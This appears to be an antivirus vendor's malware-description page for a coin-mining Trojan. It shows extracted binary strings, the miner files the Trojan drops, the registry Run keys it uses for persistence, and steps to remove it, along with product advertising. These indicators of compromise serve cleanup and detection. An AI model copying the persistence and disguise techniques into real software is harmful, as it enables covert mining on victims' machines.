?GetPortNames@SerialPort@Ext@@SG?AV?$vector@VString@Ext@@V?$allocator@VString@Ext@@@ExtSTL@@@ExtSTL@@XZ
?Join@String@Ext@@SG?AV12@ABV12@ABV?$vector@VString@Ext@@V?$allocator@VString@Ext@@@ExtSTL@@@ExtSTL@@@Z
>".%C,)
00 (~ 80(0(
1000000
(($,$ $($0$ 4$$ $
`.rdata
@.data
.rsrc
@.reloc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3948

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\zTIcT\phatk.cl (606 bytes)
    %Documents and Settings%\%current user%\Application Data\zTIcT\winlogon.exe (196 bytes)
    %Documents and Settings%\%current user%\Application Data\zTIcT\miner.dll (4899 bytes)
    %Documents and Settings%\%current user%\Application Data\zTIcT\usft_ext.dll (15324 bytes)
    %Documents and Settings%\%current user%\Application Data\zTIcT\mpir.dll (8280 bytes)
    %Documents and Settings%\%current user%\Application Data\zTIcT\taskengine.exe (601 bytes)
    %Documents and Settings%\%current user%\Application Data\zTIcT\coinutil.dll (1924 bytes)
    %Documents and Settings%\%current user%\Application Data\zTIcT\openssl.dll (10156 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\bdllsysinc (601 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "sysetyo" = "%Documents and Settings%\%current user%\Application Data\Microsoft\bdllsysinc"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Default" = "%Documents and Settings%\%current user%\Application Data\zTIcT\taskengine.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now